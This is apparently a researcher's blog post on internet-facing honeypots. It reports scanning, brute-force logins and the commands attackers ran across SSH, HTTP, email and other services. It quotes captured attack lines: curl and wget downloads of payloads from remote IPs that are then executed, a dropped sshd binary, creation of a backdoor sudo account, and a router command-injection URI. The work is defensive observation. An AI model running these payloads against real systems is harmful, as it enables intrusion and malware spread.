Simple Google-dorking will reveal tens of thousands of leaked credentials for multiple services, machine logins, email addresses, social media accounts, software license keys and pretty much anything that can grant identity. Even with Google’s attempts to skip indexing this data and masking sensitive information, there are thousands of pages found across paste sites and forums. This number grows significantly when using non-mainstream search engines. Given that a sizable amount of social media traffic and the overwhelming majority of general internet traffic is generated by bots/botnets that need some sort of identity to operate on these platforms and tend to takeover accounts to continue their campaigns, it is crucial to understand how these automated entities propagate themselves across applications and protocols.

This is where the concept of a honeypot comes in. The general idea is that we intentionally leak a part of, or all of a credential to some service to see how and where it is picked up and what is done with it. Beyond just credentials, these solutions are used to also understand tooling that is being used by bad actors or automated entities for scanning, payload generation, payload delivery and to observe interaction/behaviour.

Server overview

After initially testing multiple honeypot software on my local systems and messing around with port forwarding and containers, I realized that servers in multiple geographies would naturally attract more traffic. I spun up ~12 servers across multiple countries with varying specs, based on the services they were running. Most of the tools I used are listed in the {awesome-honeypots} project.

SSH

(remote access)

By far the most commonly enumerated protocol, TCP/22 was being enumerated within minutes of the server being up.

Within the first 48 hours alone:

Distribution of IP addresses (top 10):

23.153.232.26
185.224.128.34
157.230.80.76
122.171.18.122
171.221.205.30
122.171.19.21
115.241.74.34
121.143.130.12
59.4.213.254
220.82.240.49
... 153 more rows

Count of unique IP addresses:

Count of unauthorized login events:

grep "unauthorized login" *.log | wc -l showed 15643 events.

Distribution of SSH client software:

grep "Remote SSH version" *.log | cut -d ' ' -f 6 | sort | uniq -c | sort -nr

SSH-2.0-Go
SSH-2.0-OpenSSH_6.0p1
SSH-2.0-ZGrab
SSH-2.0-libssh2_1.10.0
SSH-2.0-OpenSSH_8.9p1
SSH-2.0-OpenSSH_9.0
SSH-2.0-OpenSSH_7.9p1
SSH-2.0-libssh_0.7.4
SSH-2.0-OpenSSH_8.4p1
SSH-2.0-makiko
SSH-2.0-libssh2_1.9.0
SSH-2.0-OpenSSH_7.4
SSH-2.0-paramiko_2.11.0
GET
SSH-2.0-OpenSSH_9.3
MGLNDD_3.111.217.202_22
MGLNDD_3.111.187.169_22
MGLNDD_18.223.119.164_22
MGLNDD_13.127.128.240_22

Distribution of usernames attempted:

root
admin
pi
ubnt
sudev
usr
super
default
ubuntu
support
Admin
ftp
telnet
zyfwp
vadmin
sFTPUser
root1
hikvision
ec2-user
user
oracle
adtecftp
www
web
posiflex
ont
vagrant
test
remotessh
postgres
os
jenkins
hello
git
fliruser
esuser
es
aws
ansible
adtec
1234
useradmin
john
guest
fedora
devops
butter
anonymous
administrator
123456

Count of unique passwords attempted:

Distribution of passwords attempted (top 20):

123456
38
root
admin
1234
password
0
raspberry
12345
test123
Admin123
Admin
asdf
admin1234
123
inflection
admin123!@#
root123
admin123456
111111

A few of the commands that were run:

Clearly, someone is trying to run an executable. Very commonly spammed:

CMD: ./oinasf; dd if=/proc/self/exe bs=22 count=1 || while read i; do echo $i; done < /proc/self/e
xe || cat /proc/self/exe;

In another case, some connections triggered SFTP-write of a malicious/patched sshd executable followed by:

dispatching: INIT requestId=3
dispatching: MKDIR requestId=1
SFTP makeDirectory: b'./.6260608818804882209'
dispatching: OPEN requestId=2
SFTP openFile: b'./.6260608818804882209/sshd'
dispatching: WRITE requestId=3
adding 65708 to 65364 in channel 0
dispatching: WRITE requestId=4
dispatching: WRITE requestId=5
 ...
dispatching: WRITE requestId=735
...
SFTP Uploaded file "sshd" to ./downloads/c589ea48755c88a02e6b15df979f85006d5572c47888
740877630c53779750c6

followed by a logout and login:

avatar root logging out
b'root' authenticated with b'password'

followed by:

CMD: echo 1 && cat /bin/echo
CMD: nohup $SHELL -c "curl http://168.119.173.48:60142/linux -o /tmp/ABO2MG1QGA; if [ ! -f /tmp/AB
O2MG1QG
CMD: head -c 2344348 > /tmp/DEsmkDf8HO
Received unhandled keyID: b'\x00'
Received unhandled keyID: b'\x00'
Received unhandled keyID: b'\x00'
...
<logout>

In some cases, after the patched sshd executable was written, the following was executed:

chmod +x ./.8278773721751228781/sshd;nohup ./.8278773721751228781/sshd 191.252.204.41 5.42.73.122 162.240.149.176 202.133.88.34 111.74.23.213 112.4.238.226 89.116.73.228 117.250.10.204 122.228.207.106 37.60.225.36 107.172.84.105 60.13.37.55 193.203.161.58 159.203.68.250 117.161.233.102 164.92.166.153 95.164.33.119 116.103.228.45 222.77.96.7 18.139.171.248 143.198.110.204 222.186.3.91 107.174.250.150 61.185.15.118 125.122.27.208 193.169.244.205 77.91.78.243 125.220.195.10 18.61.211.205 202.5.16.82 37.58.18.181 92.246.91.100 62.72.1.151 59.38.100.77 125.124.179.148 37.58.18.246 88.218.249.242 221.181.168.32 222.77.96.50 120.71.183.216 125.124.199.57 143.178.159.78 216.181.107.48 114.236.138.231 158.51.96.38 131.153.225.186 80.151.78.147 51.79.230.233 192.227.148.214 221.229.107.155 61.164.145.11 &

nohup <the list above>

It is interesting that a lot of these agents do not try to take over the account entirely. They opportunistically use the credentials to propagate malware.

Some other commands included:

/ip cloud print

ifconfig

uname -a

cat /proc/cpuinfo

ps -ef

ps | grep '[Mm

who

uptime

echo -e "\x6F\x6B"

ls -la /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/
smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*

nohup $SHELL -c "curl http://43.132.150.184:60134/linux -o /tmp/AhjLPQOFR9; if [ ! -f /tmp/AhjLPQOFR9'

apt update && apt install sudo curl -y && sudo useradd -m -p $(openssl passwd
 -1 9rDYBD6Z) system && sudo usermod -aG sudo system

openssl passwd -1 9rDYBD6Z

sudo useradd -m -p  system

sudo usermod -aG sudo system

Clearly, there is a large repository of persistence and priv-esc methods and system-recon we can learn from here. Just a reminder: the data above is from only the first 48 hours.

FTP

(file server)

Within the first 48 hours alone:

Surprisingly, not a lot of activity here.

Distribution of IP addresses:

'64.62.197.105'
'205.210.31.194'
'198.235.24.16'
'198.235.24.143'
'198.235.24.142'
'192.241.222.77'
'107.170.224.58'
'87.236.176.185'
'87.236.176.181'
'205.210.31.149'
'198.235.24.248'
'104.152.52.129'

Distribution of commands issued:

'AUTH'
 'USER'
'SYST'
'PASS'
'TYPE'
'LIST'
'QUIT'
'\x03  *%À     COOKIE

There were 2 LIST operations performed, both with the argument home/ftp/db.txt.

Telnet

(remote access)

Within the first 24 hours alone:

Count of unique IP addresses (top 10):

"117.235.230.152"
"85.204.215.57"
"36.111.149.84"
"123.154.252.138"
"222.189.105.241"
"95.189.48.180"
"92.46.224.46"
"92.15.182.194"
"91.92.252.209"
"89.248.162.159"

Distribution of usernames attempted (Top 10):

"root"
"admin"
"guest"
"supervisor"
"user"
"888888"
"ubnt"
"tech"
"support"
"service"

Distribution of passwords attempted (top 20):

"12345"
"password"
"admin"
"1234"
"user"
"aquario"
"888888"
"54321"
"1234567890"
""
"pass"
"Win1doW$"
"7ujMko0admin"
"666666"
"5up"
"123456"
"zsun1188"
"zhongxing"
"xmhdipc"
"ttnet"

HTTP and HTTPS

(web server)

Within the first 24 hours alone:

Distribution of request type:

"GET"
"POST"
"HEAD"

Distribution of request URIs:

"/"
"/.env"
"/Core/Skin/Login.aspx"
"/favicon.ico"
"/test"
"/robots.txt"
"/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+
     %2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+
     shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk)"
"example.com:80"
"/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
"/upl.php"
"/systembc/password.php"
"/sitemap.xml"
"/password.php"
"/info.php"
"/geoip/"
"/form.html"
"/files/"
"/bundle.js"
"/1.php"
"/.well-known/security.txt"
"/.git/config"
"/sugar_version.json"

.. and many, many more.

The request to the particularly interesting URI

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk)

had the user agent: Root Sl*t(censored).

Email

I looked through a lot of methodology for recon, propagation and persistence and found that due to mainstream providers (ex. Google) having practices such as mandatory recovery setup and activity notifications, ‘disposable’ and non-mainstream providers are of significant interest to the entities looking for addresses. I created many, many accounts across providers and started to leak them across paste sites, forums and social media and was surprised at the near-instant attempts at brute-force logins. After reading multiple reports on malware and humans that try to covertly use leaked credentials, I found that many intend to use the credential as long as possible without raising any alarms, i.e. simply start using the account without taking it over (which would naturally force the owner to reset it). A similar pattern can be seen with the SSH honeypot earlier in the article. After login, there is an immediate attempt to install malware and execute rather than to change the key and fully own the user. This opportunistic approach makes sense since most of these accounts are ‘disposable’ or ‘use-and-abandon’ and are not the go-to choice for most people’s main identity, and from a bad actor’s point of view, immediate use is more valuable than the risk and effort of reset. The rate of a user actually checking these accounts is quite low, and the rate of abandonment (as long as there is no ‘reset notification’) is quite high. And so, I started leaking the password along with the email address, to see the SSH equivalent of the ‘commands executed’.

Many accounts were taken over (password changed and I lost access), however, for the accounts that were logged into without password change, a large number of sign-ups to social media, chat sites, pastebins and interaction services occurred. Some accounts started sending out phishing/spam/advertisement email. Some accounts started sending out and receiving email addresses, IP addresses and social media handles to/from other email addresses, pastebin links and anonymous note-URLs - possibly bots/botmasters or human operators trying to collect and share details to further escalate interaction. I wanted to see what actually happens on those social media accounts, but attempts at logging into them from my device resulted in account-block from the platform, likely due to spam detection (logins from different IP, scraping, rapid interactions etc.) even across multiple networks (home, proxy, etc.). The timing of the messages was sporadic and the number of social media handles and email addresses sent per file varied. Some usernames obviously indicated humans and were mostly used for free software trials, website sign-ups and social media applications, however, many usernames seemed to follow a pattern, likely part of a botnet.

Note: I visited some of the social media profiles that were being collected and transferred and they seemed to belong to real people. Perhaps these handles and email addresses were farmed through an operator/bot interacting with real people and sent to a botmaster or another operator. I will not be posting any of their usernames or email addresses and have deleted/disposed of the accounts.

LDAP

(directory services)

Within the first 48 hours alone:

Count of unique IP addresses (top 10):

"71.174.241.122"
"117.247.23.204"
"8.213.129.112"
"45.83.66.216"
"45.83.64.112"
"45.33.80.243"
"205.210.31.6"
"205.210.31.48"
"205.210.31.3"
"205.210.31.177"
"205.210.31.16"

I ran a low interaction solution for LDAP and might explore a more sophisticated solution in the future.

SMB

(network file shares)

Within the first 24 hours alone:

Count of unique IP addresses (top 10):

"213.6.17.78"
"59.153.18.93"
"182.78.227.58"
"182.239.114.72"
"95.181.128.134"
"191.33.93.162"
"171.224.180.227"
"125.162.237.19"
"103.183.240.2"
"123.25.115.28"

Distribution of workgroup names attempted:

(domainname\\administrator,LOCALPCNAME)"
(WORKGROUP\\Administrator,WIN-48Q9KQD852D)"
(\\for,)"
(\\accounts,)"
(\\사용자,)"
(\\User,)"
(\\\\\\,)"
(\\,)"
\\
(\\계정,)"
.\\
(\\GUEST,)"
(WORKGROUP\\,WINDOWS)"

IPP

(printing over the internet)

I ran a low interaction honeypot for this protocol and received a few scan requests from CensysInspect/1.1 to POST /ipp and a few requests with the following payload:

VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://54.151.110.227:631/ipp|ATTR requested-attributes all

MSSQL and MySQL

(database servers)

Within the first 24 hours alone:

Count of unique IP addresses (top 10):

"58.210.84.206"
"223.68.154.158"
"128.65.181.53"
"36.134.98.177"
"121.28.0.62"
"60.1.128.255"
"45.250.231.106"
"45.201.132.128"
"41.205.56.191"
"23.224.97.225"

I also noticed a lot of password spraying with the username sa and 468 passwords. Some examples are below:

"P@$$w0rd"
"Heaven"
"Douglas1"
"Dennis"
"Aa12345678"
"Aa123456"
"ALEX"
"ABCabc123"
"A123456"
"88888888"
"62 35 61 38 61 63 36 66 38 30 35 39 36 34 31 31 33 34 32 32 37 3"
"6105"
"5201314"
"4yqbm4,m`~!@~#$%^&*(),.;"

MySQL had similar characteristics, with the addition of a few interesting usernames:

\x17a-ٸe
TL'W{\x12^
)\x08і
.3K
 J+,

PJL

(printer and host communication protocol)

A low interaction solution, however, a few interesting commands were submitted:

"@PJL INFO ID\r\n\r\n"
"@PJL INFO ID\r\n\r\n"
"@PJL INFO ID\r\n\r\n"
"@PJL INFO STATUS\n@PJL INFO ID\n"
"GET / HTTP/1.1\r\nHost: 13.233.138.158:9100\r\nAccept: */*\r\nConnection: close\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36\r\n\r\n"
"GET / HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36\r\nAccept-Language: en-US,en;q=0.9\r\nConnection: close\r\nHost: 54.151.110.227:9100\r\n\r\n"
"GET / HTTP/1.1\r\nUser-Agent: curl/7.29.0\r\nHost: 13.233.138.158\r\nAccept: */*\r\n\r\n"
"HELPREDIS\r\ninfo\r\n"
"User User\r\n"

Elastic

(document indexing and search engine)

A low interaction solution here as well, however, a few interesting requests were seen:

"GET / HTTP/1.0\r\n"
"GET / HTTP/1.1\r\n"
"GET /?CAVIT HTTP/1.1\r\n"
"GET /_search HTTP/1.1\r\n"
"GET /api HTTP/1.0\r\n"
"GET /hazelcast/rest/cluster HTTP/1.0\r\n"
"GET /nice%20ports%2C/Tri%6Eity.txt%2ebak HTTP/1.0\r\n"
"GET /server-info HTTP/1.1\r\n"
"GET /version HTTP/1.1\r\n"

The problem remains

As we can see, the number of bots AND humans attempting to gain an identity or an account is massive. IPv4 space is continuously being port scanned and web-content is continuously being searched and indexed. There are countless forums giving out thousands of credentials and keys of all types, sometimes free, sometimes paid on the general internet which show up on the first page of Google itself. Once again, the actual number of sites discovered grows exponentially with alternative search engines.

I also found multiple open-source and readily available tools that create addresses in bulk while avoiding abuse detection. Many online forums and open-source tools also present out-of-box solutions that trivially bypass limitations on fetching and sending email programmatically via API or through IMAP/SMTP libraries through the use of browser automation. This implies that bots and human operators can readily create addresses in bulk with a relatively low barrier to entry.

With the boundaries between bad-actors, bots and genuine users getting more blurry by the day, attacks are becoming more sophisticated and covert. Password breach detection solutions such as haveibeenpwned are at the forefront of user notification in context of organization breach, however, we need systems that can scan the IPv4 space and web to lower the rate of identity compromise and malicious activity, and minimize the time to notification.

What’s next?

Further analysis of bot/human behaviour in credential search

In the shortest case, an SSH login was picked up within 2 minutes of being posted to a paste site. Scrapers or human operators might choose to try credentials based on the manner of presentation of the information. It would be interesting to see how scrapers/humans behave in combinations of the following variables:

one-address leaks
multiple-address leaks
some credentials working
all credentials working
no credentials working
timer on the content

Research on honeypot detection is becoming popular, and will further lead to smarter honeypots.

Further analysis of account recovery mechanism vs. takeover

Initially, many accounts were logged into and had their password changed, at which point, I lost access since I did not set any recovery mechanism. With a recovery email set, it got better, but still, many a time it was unset and I lost access again. However, after setting less common recovery methods such as phrases/key-files, relatively fewer takeovers occurred. Given that recovery email/phone numbers are the most common methods used, they are presented front and center and may clearly direct actions of a bad actor once taken over. For example, a recovery email may be deleted since the attacker already knows the password and is in the account. However, lesser used mechanisms such as phrases/key-files or device-binding being presented in different UI sections altogether seems to do a better job of not being overridden. There should be user awareness generated about these mechanisms as stronger alternatives.

Can we predict usernames and addresses that bots will use to intercept info or thwart networks?

It would also be of interest to see the pattern of usernames being used and to try and take up the address space or intercept the process. Bot detection on social media sites is a big problem, and maybe creating accounts or blocking predictable usernames after a naming-pattern with bots has been established could help. What’s more interesting is, given the fact that a lot of modern malware, botnets and human operators use social media as C&C, would creating accounts based on a username pattern lead us to pings/beacons from the ‘real’ bots or the ‘real’ human operators? There is some academic and hobbyist research on this area, but it seems to be in its early stages. A very interesting rabbit hole to go down.

Leak discovery and improved awareness

I have additional research ongoing regarding content discovery and will be writing that up soon. It would be nice to have a service that will monitor email leaks and inform users across multiple mediums. Password breach detection services such as haveibeenpwned are quite popular, however, I have not come across any that scrape the general internet or IPv4 port-space looking for leaks. Informing the user can lead to improved awareness and lower the chance of a phishing/spam/scam campaign. I also intend to search alternative networks for this, namely IPFS.

Note: all the opinions presented in this article are purely my own and do not represent any other entity. All the tools and techniques I have described here are for research purposes. Do not attempt to scan or log into an account or service that you do not own.

Server overview

SSH

Within the first 48 hours alone:

What happens upon successful login?

FTP

Within the first 48 hours alone:

Telnet

Within the first 24 hours alone:

HTTP and HTTPS

Within the first 24 hours alone:

Email

LDAP

Within the first 48 hours alone:

SMB

Within the first 24 hours alone:

IPP

MSSQL and MySQL

Within the first 24 hours alone:

PJL

Elastic

The problem remains

What’s next?

Further analysis of bot/human behaviour in credential search

Further analysis of account recovery mechanism vs. takeover

Can we predict usernames and addresses that bots will use to intercept info or thwart networks?

Leak discovery and improved awareness